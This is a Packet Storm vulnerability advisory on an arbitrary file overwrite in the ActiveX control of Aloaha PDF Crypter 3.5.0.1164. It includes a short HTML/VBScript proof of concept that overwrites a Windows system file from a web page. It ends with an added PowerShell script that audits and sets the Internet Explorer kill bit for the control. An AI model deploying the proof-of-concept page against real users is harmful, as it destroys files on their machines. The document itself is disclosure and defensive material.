Aloaha PDF Crypter 3.5.0.1164 File Overwrite

2013-01-24T00:00:00
ID PACKETSTORM:119813
Type packetstorm
Reporter shinnai
Modified 2013-01-24T00:00:00

Description

                                        
`
============================================================================================  
TITLE:  
============================================================================================  
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite  
  
url: http://www.aloaha.com/  
download: http://www.aloaha.com/download/aloaha_crypter.zip  
author: shinnai (http://shinnai.altervista.org)  
============================================================================================  
FILE INFO:  
============================================================================================  
File: C:\WINDOWS\system32\vbCrypt.dll  
InternalName: ebCrypt  
OriginalFilename: ebCrypt.DLL  
FileVersion: 2.0.0.2087  
FileDescription: ebCrypt Main Module  
Product: ebCrypt  
ProductVersion: 2.0.0.2087  
Language: English (United States)  
MD5 hash: b262cb93c555c3c9604502d071a783ec  
============================================================================================  
ACTIVEX INFO:  
============================================================================================  
ProgID: EbCrypt.eb_c_PRNGenerator.1  
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}  
Description: eb_c_PRNGenerator Class  
Safety report:  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller,data  
============================================================================================  
BUG:  
============================================================================================  
This ActiveX control exposes the "SaveToFile" method, which could be used to overwrite arbitrary files on  
users' PCs.  
============================================================================================  
PROOF OF CONCEPT  
============================================================================================  
<html>  
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>  
<script language='vbscript'>  
test.SaveToFile "c:\windows\_system.ini"  
</script>  
</html>  
============================================================================================  
  
  
`
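
A defender's check for the control described above, as an added example that is not part of the original advisory: it reports whether the CLSID from the advisory is registered and whether the Internet Explorer kill bit (Compatibility Flags 0x400) is set for it. The `-Apply` switch and all variable names are assumptions of this example; the kill bit is written only when that switch is given.

```powershell
# Added example (not from the advisory): audit the IE kill bit for the reported CLSID.
param([switch]$Apply)  # hypothetical switch; without it the script only reports

$Clsid   = '{B1E7505E-BBFD-42BF-98C9-602205A1504C}'  # GUID from the advisory
$KillBit = 0x400                                      # "kill bit" in Compatibility Flags
$Compat  = 'Microsoft\Internet Explorer\ActiveX Compatibility'

# A 32-bit control on 64-bit Windows registers in the WOW64 view, so check both.
$views = @(
    @{ Name = 'native'; Class = 'HKLM:\SOFTWARE\Classes\CLSID'
       Flags = "HKLM:\SOFTWARE\$Compat" },
    @{ Name = 'wow64'; Class = 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'
       Flags = "HKLM:\SOFTWARE\Wow6432Node\$Compat" }
)

foreach ($v in $views) {
    $inproc  = Join-Path (Join-Path $v.Class $Clsid) 'InprocServer32'
    $flagKey = Join-Path $v.Flags $Clsid

    # Registered? The default value of InprocServer32 is the DLL that backs the control.
    $server = $null
    if (Test-Path -LiteralPath $inproc) {
        $server = (Get-Item -LiteralPath $inproc).GetValue('')
    }

    # Current Compatibility Flags for this CLSID (0 when the key or value is absent).
    $flags = 0
    if (Test-Path -LiteralPath $flagKey) {
        $value = (Get-Item -LiteralPath $flagKey).GetValue('Compatibility Flags')
        if ($null -ne $value) { $flags = [int]$value }
    }
    $killed = ($flags -band $KillBit) -ne 0

    if ($Apply -and $server -and -not $killed) {
        # Needs an elevated session. OR the bit in so existing flags survive.
        if (-not (Test-Path -LiteralPath $flagKey)) { New-Item -Path $flagKey -Force | Out-Null }
        $flags = $flags -bor $KillBit
        New-ItemProperty -LiteralPath $flagKey -Name 'Compatibility Flags' `
            -PropertyType DWord -Value $flags -Force | Out-Null
        $killed = $true
    }

    [pscustomobject]@{
        View = $v.Name; Registered = [bool]$server; Server = $server
        Flags = '0x{0:X8}' -f $flags; KillBitSet = $killed
    }
}
```

Run it from a 64-bit PowerShell session so the 'native' view is not redirected to WOW64.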